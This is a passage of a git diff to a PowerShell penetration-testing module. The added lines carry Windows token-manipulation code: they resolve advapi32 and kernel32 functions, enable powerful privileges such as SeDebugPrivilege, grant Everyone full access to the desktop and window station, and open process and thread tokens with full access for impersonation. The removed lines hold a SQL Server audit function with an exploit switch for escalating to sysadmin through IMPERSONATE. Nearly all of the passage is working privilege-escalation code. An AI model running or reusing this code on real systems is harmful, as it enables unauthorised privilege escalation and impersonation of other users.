Get-DelegateType @([IntPtr], [IntPtr].MakeByRefType()) ([UInt32]) + $LsaGetLogonSessionData = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaGetLogonSessionDataAddr, $LsaGetLogonSessionDataDelegate) + + $CreateProcessWithTokenWAddr = Get-ProcAddress advapi32.dll CreateProcessWithTokenW + $CreateProcessWithTokenWDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool]) + $CreateProcessWithTokenW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessWithTokenWAddr, $CreateProcessWithTokenWDelegate) + + $memsetAddr = Get-ProcAddress msvcrt.dll memset + $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr]) + $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate) + + $DuplicateTokenExAddr = Get-ProcAddress advapi32.dll DuplicateTokenEx + $DuplicateTokenExDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType()) ([Bool]) + $DuplicateTokenEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DuplicateTokenExAddr, $DuplicateTokenExDelegate) + + $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW + $LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool]) + $LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate) + + $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle + $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool]) + $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate) + + $LsaFreeReturnBufferAddr = Get-ProcAddress secur32.dll LsaFreeReturnBuffer + $LsaFreeReturnBufferDelegate = Get-DelegateType @([IntPtr]) ([UInt32]) + $LsaFreeReturnBuffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaFreeReturnBufferAddr, $LsaFreeReturnBufferDelegate) + + $OpenThreadAddr = Get-ProcAddress kernel32.dll OpenThread + $OpenThreadDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) + $OpenThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadAddr, $OpenThreadDelegate) + + $OpenThreadTokenAddr = Get-ProcAddress advapi32.dll OpenThreadToken + $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool]) + $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate) + + $CreateProcessAsUserWAddr = Get-ProcAddress advapi32.dll CreateProcessAsUserW + $CreateProcessAsUserWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool]) + $CreateProcessAsUserW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessAsUserWAddr, $CreateProcessAsUserWDelegate) + + $OpenWindowStationWAddr = Get-ProcAddress user32.dll OpenWindowStationW + $OpenWindowStationWDelegate = Get-DelegateType @([IntPtr], [Bool], [UInt32]) ([IntPtr]) + $OpenWindowStationW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenWindowStationWAddr, $OpenWindowStationWDelegate) + + $OpenDesktopAAddr = Get-ProcAddress user32.dll OpenDesktopA + $OpenDesktopADelegate = Get-DelegateType @([String], [UInt32], [Bool], [UInt32]) ([IntPtr]) + $OpenDesktopA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenDesktopAAddr, $OpenDesktopADelegate) + + $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf + $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool]) + $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate) + + $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA + $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], $LUID.MakeByRefType()) ([Bool]) + $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate) + + $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges + $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], $TOKEN_PRIVILEGES.MakeByRefType(), [UInt32], [IntPtr], [IntPtr]) ([Bool]) + $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate) + + $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread + $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr]) + $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate) + + $GetSecurityInfoAddr = Get-ProcAddress advapi32.dll GetSecurityInfo + $GetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType()) ([UInt32]) + $GetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetSecurityInfoAddr, $GetSecurityInfoDelegate) + + $SetSecurityInfoAddr = Get-ProcAddress advapi32.dll SetSecurityInfo + $SetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([UInt32]) + $SetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetSecurityInfoAddr, $SetSecurityInfoDelegate) + + $GetAceAddr = Get-ProcAddress advapi32.dll GetAce + $GetAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([IntPtr]) + $GetAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAceAddr, $GetAceDelegate) + + $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW + $LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool]) + $LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate) + + $AddAccessAllowedAceAddr = Get-ProcAddress advapi32.dll AddAccessAllowedAce + $AddAccessAllowedAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr]) ([Bool]) + $AddAccessAllowedAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AddAccessAllowedAceAddr, $AddAccessAllowedAceDelegate) + + $CreateWellKnownSidAddr = Get-ProcAddress advapi32.dll CreateWellKnownSid + $CreateWellKnownSidDelegate = Get-DelegateType @([UInt32], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool]) + $CreateWellKnownSid = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateWellKnownSidAddr, $CreateWellKnownSidDelegate) + + $SetEntriesInAclWAddr = Get-ProcAddress advapi32.dll SetEntriesInAclW + $SetEntriesInAclWDelegate = Get-DelegateType @([UInt32], $EXPLICIT_ACCESS.MakeByRefType(), [IntPtr], [IntPtr].MakeByRefType()) ([UInt32]) + $SetEntriesInAclW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetEntriesInAclWAddr, $SetEntriesInAclWDelegate) + + $LocalFreeAddr = Get-ProcAddress kernel32.dll LocalFree + $LocalFreeDelegate = Get-DelegateType @([IntPtr]) ([IntPtr]) + $LocalFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LocalFreeAddr, $LocalFreeDelegate) + + $LookupPrivilegeNameWAddr = Get-ProcAddress advapi32.dll LookupPrivilegeNameW + $LookupPrivilegeNameWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool]) + $LookupPrivilegeNameW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeNameWAddr, $LookupPrivilegeNameWDelegate) + ############################### + + + #Used to add 64bit memory addresses + Function Add-SignedIntAsUnsigned + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Int64] + $Value1, + + [Parameter(Position = 1, Mandatory = $true)] + [Int64] + $Value2 + ) + + [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) + [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) + [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) + + if ($Value1Bytes.Count -eq $Value2Bytes.Count) + { + $CarryOver = 0 + for ($i = 0; $i -lt $Value1Bytes.Count; $i++) + { + #Add bytes + [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver + + $FinalBytes[$i] = $Sum -band 0x00FF + + if (($Sum -band 0xFF00) -eq 0x100) + { + $CarryOver = 1 + } + else + { + $CarryOver = 0 + } + } + } + else + { + Throw "Cannot add bytearrays of different sizes" + } + + return [BitConverter]::ToInt64($FinalBytes, 0) + } + + + #Enable SeAssignPrimaryTokenPrivilege, needed to query security information for desktop DACL + function Enable-SeAssignPrimaryTokenPrivilege + { + [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke() + if ($ThreadHandle -eq [IntPtr]::Zero) + { + Throw "Unable to get the handle to the current thread" + } + + [IntPtr]$ThreadToken = [IntPtr]::Zero + [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if ($Result -eq $false) + { + if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN) + { + $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION) + if ($Result -eq $false) + { + Throw (New-Object ComponentModel.Win32Exception) + } + + $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) + if ($Result -eq $false) + { + Throw (New-Object ComponentModel.Win32Exception) + } + } + else + { + Throw ([ComponentModel.Win32Exception] $ErrorCode) + } + } + + $CloseHandle.Invoke($ThreadHandle) | Out-Null + + $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID) + $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize) + $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID) + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr) + + $Result = $LookupPrivilegeValue.Invoke($null, "SeAssignPrimaryTokenPrivilege", [Ref] $LuidObject) + + if ($Result -eq $false) + { + Throw (New-Object ComponentModel.Win32Exception) + } + + [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES) + $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize) + $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES) + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr) + + $LuidAndAttributes.Luid = $LuidObject + $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED + + [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES) + $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize) + $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES) + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr) + $TokenPrivileges.PrivilegeCount = 1 + $TokenPrivileges.Privileges = $LuidAndAttributes + + $Global:TokenPriv = $TokenPrivileges + + $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero) + if ($Result -eq $false) + { + Throw (New-Object ComponentModel.Win32Exception) + } + + $CloseHandle.Invoke($ThreadToken) | Out-Null + } + + + #Enable SeSecurityPrivilege, needed to query security information for desktop DACL + function Enable-Privilege { - # Return data - if ( -not $NoOutput) + Param( + [Parameter()] + [ValidateSet("SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeBackupPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", + "SeCreatePagefilePrivilege", "SeCreatePermanentPrivilege", "SeCreateSymbolicLinkPrivilege", "SeCreateTokenPrivilege", + "SeDebugPrivilege", "SeEnableDelegationPrivilege", "SeImpersonatePrivilege", "SeIncreaseBasePriorityPrivilege", + "SeIncreaseQuotaPrivilege", "SeIncreaseWorkingSetPrivilege", "SeLoadDriverPrivilege", "SeLockMemoryPrivilege", "SeMachineAccountPrivilege", + "SeManageVolumePrivilege", "SeProfileSingleProcessPrivilege", "SeRelabelPrivilege", "SeRemoteShutdownPrivilege", "SeRestorePrivilege", + "SeSecurityPrivilege", "SeShutdownPrivilege", "SeSyncAgentPrivilege", "SeSystemEnvironmentPrivilege", "SeSystemProfilePrivilege", + "SeSystemtimePrivilege", "SeTakeOwnershipPrivilege", "SeTcbPrivilege", "SeTimeZonePrivilege", "SeTrustedCredManAccessPrivilege", + "SeUndockPrivilege", "SeUnsolicitedInputPrivilege")] + [String] + $Privilege + ) + + [IntPtr]$ThreadHandle = $GetCurrentThread.Invoke() + if ($ThreadHandle -eq [IntPtr]::Zero) + { + Throw "Unable to get the handle to the current thread" + } + + [IntPtr]$ThreadToken = [IntPtr]::Zero + [Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if ($Result -eq $false) + { + if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN) + { + $Result = $ImpersonateSelf.Invoke($Win32Constants.SECURITY_DELEGATION) + if ($Result -eq $false) + { + Throw (New-Object ComponentModel.Win32Exception) + } + + $Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) + if ($Result -eq $false) + { + Throw (New-Object ComponentModel.Win32Exception) + } + } + else + { + Throw ([ComponentModel.Win32Exception] $ErrorCode) + } + } + + $CloseHandle.Invoke($ThreadHandle) | Out-Null + + $LuidSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID) + $LuidPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidSize) + $LuidObject = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidPtr, [Type]$LUID) + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidPtr) + + $Result = $LookupPrivilegeValue.Invoke($null, $Privilege, [Ref] $LuidObject) + + if ($Result -eq $false) + { + Throw (New-Object ComponentModel.Win32Exception) + } + + [UInt32]$LuidAndAttributesSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$LUID_AND_ATTRIBUTES) + $LuidAndAttributesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($LuidAndAttributesSize) + $LuidAndAttributes = [System.Runtime.InteropServices.Marshal]::PtrToStructure($LuidAndAttributesPtr, [Type]$LUID_AND_ATTRIBUTES) + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($LuidAndAttributesPtr) + + $LuidAndAttributes.Luid = $LuidObject + $LuidAndAttributes.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED + + [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TOKEN_PRIVILEGES) + $TokenPrivilegesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize) + $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesPtr, [Type]$TOKEN_PRIVILEGES) + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesPtr) + $TokenPrivileges.PrivilegeCount = 1 + $TokenPrivileges.Privileges = $LuidAndAttributes + + $Global:TokenPriv = $TokenPrivileges + + Write-Verbose "Attempting to enable privilege: $Privilege" + $Result = $AdjustTokenPrivileges.Invoke($ThreadToken, $false, [Ref] $TokenPrivileges, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero) + if ($Result -eq $false) + { + Throw (New-Object ComponentModel.Win32Exception) + } + + $CloseHandle.Invoke($ThreadToken) | Out-Null + Write-Verbose "Enabled privilege: $Privilege" + } + + + #Change the ACL of the WindowStation and Desktop + function Set-DesktopACLs + { + Enable-Privilege -Privilege SeSecurityPrivilege + + #Change the privilege for the current window station to allow full privilege for all users + $WindowStationStr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni("WinSta0") + $hWinsta = $OpenWindowStationW.Invoke($WindowStationStr, $false, $Win32Constants.ACCESS_SYSTEM_SECURITY -bor $Win32Constants.READ_CONTROL -bor $Win32Constants.WRITE_DAC) + + if ($hWinsta -eq [IntPtr]::Zero) { - Return $TblData + Throw (New-Object ComponentModel.Win32Exception) + } + + Set-DesktopACLToAllowEveryone -hObject $hWinsta + $CloseHandle.Invoke($hWinsta) | Out-Null + + #Change the privilege for the current desktop to allow full privilege for all users + $hDesktop = $OpenDesktopA.Invoke("default", 0, $false, $Win32Constants.DESKTOP_GENERIC_ALL -bor $Win32Constants.WRITE_DAC) + if ($hDesktop -eq [IntPtr]::Zero) + { + Throw (New-Object ComponentModel.Win32Exception) } + + Set-DesktopACLToAllowEveryone -hObject $hDesktop + $CloseHandle.Invoke($hDesktop) | Out-Null } -} -# ----------------------------------- -# Invoke-SQLAuditPrivImpersonateLogin -# ----------------------------------- -# Author: Scott Sutherland -Function Invoke-SQLAuditPrivImpersonateLogin -{ - <# - .SYNOPSIS - Check if the current login has the IMPERSONATE permission on any sysadmin logins. Attempt to use permission to obtain sysadmin privileges. - .PARAMETER Username - SQL Server or domain account to authenticate with. - .PARAMETER Password - SQL Server or domain account password to authenticate with. - .PARAMETER Credential - SQL Server credential. - .PARAMETER Instance - SQL Server instance to connection to. - .PARAMETER NoOutput - Don't output anything. - .PARAMETER Exploit - Exploit vulnerable issues - .EXAMPLE - PS C:\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123! + function Set-DesktopACLToAllowEveryone + { + Param( + [IntPtr]$hObject + ) - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - Vulnerability : PERMISSION - IMPERSONATE LOGIN - Description : The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges. - Remediation : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON - Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user] - Severity : High - IsVulnerable : Yes - IsExploitable : Yes - Exploited : No - ExploitCmd : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Exploit - Details : public can impersonate the sa SYSADMIN login. This test was ran with the evil login. - Reference : https://msdn.microsoft.com/en-us/library/ms181362.aspx - Author : Scott Sutherland (@_nullbind), NetSPI 2016 - .EXAMPLE - PS C:\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123! -Exploit + [IntPtr]$ppSidOwner = [IntPtr]::Zero + [IntPtr]$ppsidGroup = [IntPtr]::Zero + [IntPtr]$ppDacl = [IntPtr]::Zero + [IntPtr]$ppSacl = [IntPtr]::Zero + [IntPtr]$ppSecurityDescriptor = [IntPtr]::Zero + #0x7 is window station, change for other types + $retVal = $GetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, [Ref]$ppSidOwner, [Ref]$ppSidGroup, [Ref]$ppDacl, [Ref]$ppSacl, [Ref]$ppSecurityDescriptor) + if ($retVal -ne 0) + { + Write-Error "Unable to call GetSecurityInfo. ErrorCode: $retVal" + } - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - Vulnerability : PERMISSION - IMPERSONATE LOGIN - Description : The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges. - Remediation : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON - Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user] - Severity : High - IsVulnerable : Yes - IsExploitable : Yes - Exploited : Yes - ExploitCmd : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Exploit - Details : public can impersonate the sa SYSADMIN login. This test was ran with the evil login. - Reference : https://msdn.microsoft.com/en-us/library/ms181362.aspx - Author : Scott Sutherland (@_nullbind), NetSPI 2016 - #> - [CmdletBinding()] - Param( - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account to authenticate with.')] - [string]$Username, + if ($ppDacl -ne [IntPtr]::Zero) + { + $AclObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ppDacl, [Type]$ACL) - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] - [string]$Password, + #Add all users to acl + [UInt32]$RealSize = 2000 + $pAllUsersSid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($RealSize) + $Success = $CreateWellKnownSid.Invoke(1, [IntPtr]::Zero, $pAllUsersSid, [Ref]$RealSize) + if (-not $Success) + { + Throw (New-Object ComponentModel.Win32Exception) + } - [Parameter(Mandatory = $false, - HelpMessage = 'Windows credentials.')] - [System.Management.Automation.PSCredential] - [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + #For user "Everyone" + $TrusteeSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$TRUSTEE) + $TrusteePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TrusteeSize) + $TrusteeObj = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TrusteePtr, [Type]$TRUSTEE) + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TrusteePtr) + $TrusteeObj.pMultipleTrustee = [IntPtr]::Zero + $TrusteeObj.MultipleTrusteeOperation = 0 + $TrusteeObj.TrusteeForm = $Win32Constants.TRUSTEE_IS_SID + $TrusteeObj.TrusteeType = $Win32Constants.TRUSTEE_IS_WELL_KNOWN_GROUP + $TrusteeObj.ptstrName = $pAllUsersSid + + #Give full permission + $ExplicitAccessSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$EXPLICIT_ACCESS) + $ExplicitAccessPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ExplicitAccessSize) + $ExplicitAccess = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExplicitAccessPtr, [Type]$EXPLICIT_ACCESS) + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ExplicitAccessPtr) + $ExplicitAccess.grfAccessPermissions = 0xf03ff + $ExplicitAccess.grfAccessMode = $Win32constants.GRANT_ACCESS + $ExplicitAccess.grfInheritance = $Win32Constants.OBJECT_INHERIT_ACE + $ExplicitAccess.Trustee = $TrusteeObj + + [IntPtr]$NewDacl = [IntPtr]::Zero + + $RetVal = $SetEntriesInAclW.Invoke(1, [Ref]$ExplicitAccess, $ppDacl, [Ref]$NewDacl) + if ($RetVal -ne 0) + { + Write-Error "Error calling SetEntriesInAclW: $RetVal" + } - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server instance to connection to.')] - [string]$Instance, + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($pAllUsersSid) - [Parameter(Mandatory = $false, - HelpMessage = "Don't output anything.")] - [string]$NoOutput, + if ($NewDacl -eq [IntPtr]::Zero) + { + throw "New DACL is null" + } - [Parameter(Mandatory = $false, - HelpMessage = 'Exploit vulnerable issues.')] - [switch]$Exploit - ) + #0x7 is window station, change for other types + $RetVal = $SetSecurityInfo.Invoke($hObject, 0x7, $Win32Constants.DACL_SECURITY_INFORMATION, $ppSidOwner, $ppSidGroup, $NewDacl, $ppSacl) + if ($RetVal -ne 0) + { + Write-Error "SetSecurityInfo failed. Return value: $RetVal" + } - Begin - { - # Table for output - $TblData = New-Object -TypeName System.Data.DataTable - $null = $TblData.Columns.Add('ComputerName') - $null = $TblData.Columns.Add('Instance') - $null = $TblData.Columns.Add('Vulnerability') - $null = $TblData.Columns.Add('Description') - $null = $TblData.Columns.Add('Remediation') - $null = $TblData.Columns.Add('Severity') - $null = $TblData.Columns.Add('IsVulnerable') - $null = $TblData.Columns.Add('IsExploitable') - $null = $TblData.Columns.Add('Exploited') - $null = $TblData.Columns.Add('ExploitCmd') - $null = $TblData.Columns.Add('Details') - $null = $TblData.Columns.Add('Reference') - $null = $TblData.Columns.Add('Author') + $LocalFree.Invoke($ppSecurityDescriptor) | Out-Null + } } - Process + + #Get the primary token for the specified processId + function Get-PrimaryToken { - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + Param( + [Parameter(Position=0, Mandatory=$true)] + [UInt32] + $ProcessId, - # Default connection to local default instance - if(-not $Instance) + #Open the token with all privileges. Requires SYSTEM because some of the privileges are restricted to SYSTEM. + [Parameter()] + [Switch] + $FullPrivs + ) + + if ($FullPrivs) { - $Instance = $env:COMPUTERNAME + $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS + } + else + { + $TokenPrivs = $Win32Constants.TOKEN_ASSIGN_PRIMARY -bor $Win32Constants.TOKEN_DUPLICATE -bor $Win32Constants.TOKEN_IMPERSONATE -bor $Win32Constants.TOKEN_QUERY } - # Status user - Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN" + $ReturnStruct = New-Object PSObject - # Test connection to server - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' + $hProcess = $OpenProcess.Invoke($Win32Constants.PROCESS_QUERY_INFORMATION, $true, [UInt32]$ProcessId) + $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcess -Value $hProcess + if ($hProcess -eq [IntPtr]::Zero) + { + #If a process is a protected process it cannot be enumerated. This call should only fail for protected processes. + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Verbose "Failed to open process handle for ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error code: $ErrorCode . This is likely because this is a protected process." + return $null } - if(-not $TestConnection) + else + { + [IntPtr]$hProcToken = [IntPtr]::Zero + $Success = $OpenProcessToken.Invoke($hProcess, $TokenPrivs, [Ref]$hProcToken) + + #Close the handle to hProcess (the process handle) + if (-not $CloseHandle.Invoke($hProcess)) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "Failed to close process handle, this is unexpected. ErrorCode: $ErrorCode" + } + $hProcess = [IntPtr]::Zero + + if ($Success -eq $false -or $hProcToken -eq [IntPtr]::Zero) + { + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + Write-Warning "Failed to get processes primary token. ProcessId: $ProcessId. ProcessName $((Get-Process -Id $ProcessId).Name). Error: $ErrorCode" + return $null + } + else + { + $ReturnStruct | Add-Member -MemberType NoteProperty -Name hProcToken -Value $hProcToken + } + } + + return $ReturnStruct + } + + + function Get-ThreadToken + { + Param( + [Parameter(Position=0, Mandatory=$true)] + [UInt32] + $ThreadId + ) + + $TokenPrivs = $Win32Constants.TOKEN_ALL_ACCESS + + $RetStruct = New-Object PSObject + [IntPtr]$hThreadToken = [IntPtr]::Zero + + $hThread = $OpenThread.Invoke($Win32Constants.THREAD_ALL_ACCESS, $false, $ThreadId) + if ($hThread -eq [IntPtr]::Zero) { - # Status user - Write-Verbose -Message "$Instance : CONNECTION FAILED." - Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: PERMISSION - IMPERSONATE LOGIN" - Return + $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() + if ($ErrorCode -ne $Win32Constants.ERROR_INVALID_PARAMETER) #The thread probably no longer exists + { + Write-Warning "Failed to open thread handle for ThreadId: $ThreadId. 